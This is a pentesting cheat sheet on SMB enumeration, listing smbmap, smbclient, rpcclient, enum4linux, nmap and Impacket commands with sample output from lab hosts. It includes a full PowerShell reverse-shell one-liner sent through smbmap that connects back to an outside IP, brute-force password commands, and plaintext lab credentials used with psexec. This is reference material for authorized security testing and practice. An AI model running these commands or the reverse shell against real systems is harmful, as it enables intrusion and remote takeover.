Pentesting SMB

SMB Enumeration

  • The SMB is a network file sharing protocol that provides access to shared files and printers on a local network.

  • When clients and servers use different operating systems and SMB versions, the highest supported version will be used for communication.

  • SMB uses the following TCP and UDP ports:

Netbios-ns 137/tcp #NETBIOS Name Service
Netbios-ns 137/udp
netbios-dgm 138/tcp #NETBIOS Datagram Service
Netbios-dgm 138/udp
Netbios-ssn 139/tcp #NETBIOS session service
Netbios-ssn 139/udp
Microsoft-ds 445/tcp #if you are using active directory

SMB Checklist

  • Basic Commands

  • From SMB command line

  • View/Get Files

get services.txt
more services.txt

  • Enumerate Hostname

nmblookup -A $ip

  • List Shares

smbmap -H $ip
smbclient -L 10.129.101.197 -U Administrator
nmap --script smb-enum-shares -p 139,445 $ip

  • Connect to a listed share

smbclient \\\\10.129.101.197\\C$ -U Administrator
smbclient \\\\$ip\\[share name]

  • Check Null Sessions

smbmap -u anonymous -H 10.10.115.116
smbmap -H $ip
rpcclient -U "" -N $ip

  • With authentication

smbmap -u svc-admin -p management2005 -H 10.10.248.93

  • Check for Vulnerabilities

nmap --script smb-vuln* -p 139,445 $ip

  • Overall Scan

enum4linux -a $ip

  • Get a shell with smbmap (windows)

smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'

  • Brute Force SMB

medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv

smbmap

  • smbmap is one of the best ways to enumerate samba. smbmap allows pen-testers to run commands(given proper permissions), download and upload files, and overall is just incredibly useful for smb enumeration.

smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"

  • -s -> specify the share to enumerate

  • -d -> specify the domain to enumerate

  • --download -> downloads a file

  • --upload -> uploads a file

smbclient

  • List shares

smbclient -L 10.10.115.116

  • smbclient allows you to do most of the things you can do with smbmap, and it also offers you and interactive prompt.

  • -w -> specify the domain(workgroup) to use when connecting to the host

  • -I -> specify the ip address of the host

  • -c "ipconfig" -> would run the ipconfig command on the host

  • -U -> specify the username to authenticate with

  • -P -> specifies the password to authenticate with

  • -N -> tells smbclient to not use a password

  • get test -> would download the file named test

  • put /etc/hosts -> would put your /etc/hosts file on the target

  • Syntax:

  • To see which shares are available on a given host, run:

 /usr/bin/smbclient -L 10.10.10.10

  • For example, if you are trying to reach a directory that has been shared as 'public' on a machine called 10.10.10.10, the service would be called \10.10.10.10\public. -

  • However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:

/usr/bin/smbclient \\\\10.10.10.10\\public mypasswd

  • To authenticate with a null sessions

smbmap -u 'root' -p '' -H 10.10.232.5 -x 'ip addr'

  • smbclient with domain credentials 

smbclient -U 'RLAB\ngodfrey' -p 445 -L 127.0.0.1

rpcclient

  • A tool used for executing client-side MS-RPC functions. A null session in a connection with a samba or SMB server that does not require authentication with a password.

rpcclient -U "" [target ip address]

  • The -U option defines a null username, you will be asked for a password but leave it blank (hit enter!!!!)

  • The command line will change to the rpcclient context

rpcclient $>

  • To retrieve some general information about the server like the domain and number of users:

querydominfo

  • This command returns the domain, server, total users on the system and some other useful information.

  • Also shows the total number of user accounts and groups available on the target system.

  • To retrieve a list of users present on the system

enumdomusers

  • The result is a list of user accounts available on the system with the RID in hex. We can now use rpcclient to query the user info for more information:

lookupsids #convert SIDs to names
lookupsids S-1-5-21-3981879597-1135670737-2718083060-1002
lookupnames #convert names to SIDs
lookupnames Bill
queryuser 0x47f #get the user rid form enomdomusers command
queryusergroups 0x47b #use the rid for the username to see their group membership
querygroup 0x47c #when you get the group membership back use those rids for this query
enumprivs
found 35 privileges
SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

  • Enumerate Privleges on the target box

getusername
Account Name: Guest, Authority Name: RELEVANT

  • Get username you are running as

queryuser [username]
username=pbx
queryuser pbx, queryuser 1000, queryuser 0x3e8

-This command will return information about the profile path on the server, the home drive, password related settings and a lot more.

  • To see an overview of all enumeration objects just type enum+tabx2.

  • If you get an error that says:

Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED

  • Occurs because the minimum protocol version for smbclient has been set to SMB2_02

  • Fix with:

sudo vim /etc/samba/smb.conf

  • Add the following line to the config under the [global] section

client min protocol = CORE

  • Alternative method to enumdomusers is through RID cycling.

  • To determine the full SID we can run the: ‘lookupnames’ command and search for the domain with the following command:

lookupnames pbx

  • There are two sets of RIDS 500-1000 for system and 1000-10000 for Domain created users and groups.

  • If we append -500 to the SID and look it up using the lookupsids command we get the following output with the username:

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-500
S-1-5-21-532510730-1394270290-3802288464-500 *unknown*\*unknown* (8)

  • Shows SID is unknown, increase by one

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-501
S-1-5-21-532510730-1394270290-3802288464-501 PBX\nobody (1)

  • Find a valid user, increase the RID to 1000.

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-1000
S-1-5-21-532510730-1394270290-3802288464-1000 PBX\pbx (1)

  • Have the full SID now

lookupsid.py Username Enumeration

  • Impacket’s lookupsid.py performs bruteforcing of Windows SID’s to identify users/groups on the remote target.

  • You need to be able to connect to IPC$ without authentication or with a known password and username 

python3 lookupsid.py [email protected] | tee users.txt
Password:
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

Enum4linux

  • Enum4linux is a linux alternative to enum.exe and it is used to enumerate data from windows or samba hosts.

enum4linux [target ip]

-Will auto RID cycle

  • Part of autorecon!

  • Recommend to > output to a text file for reference (its alot)

Nmap SMB scripts

ls -l /usr/share/nmap/scripts/smb*
nmap --script=[scriptname] [target ip]

  • For smb-os-discovery:

nmap -p 139,445 --script=smb-os-discovery [target ip]

  • First scans the target for all known SMB vulnerabilities

  • Second to see if target is vulnerable to EternalBlue

nmap -p 139,445 --script=smb-vuln* [target ip]
nmap -p 445 [target] --script=smb-vuln-ms17-010

Finding the Password Policy

  • Various ways to find a box's password policy 

crackmapexec smb 10.10.10.161 --pass-pol
crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''
enum4linux 10.10.10.161

  • The reason this will sometimes not work is because when you install a new domain now null sessions will be disabled

  • However when a domain was upgraded from Windows 2000/2003/2008 they kept this feature on in order to have backwards compatibility

Impacket psexec command execution 

psexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir
PreviousPentesting EmailNextPentesting Redis

Last updated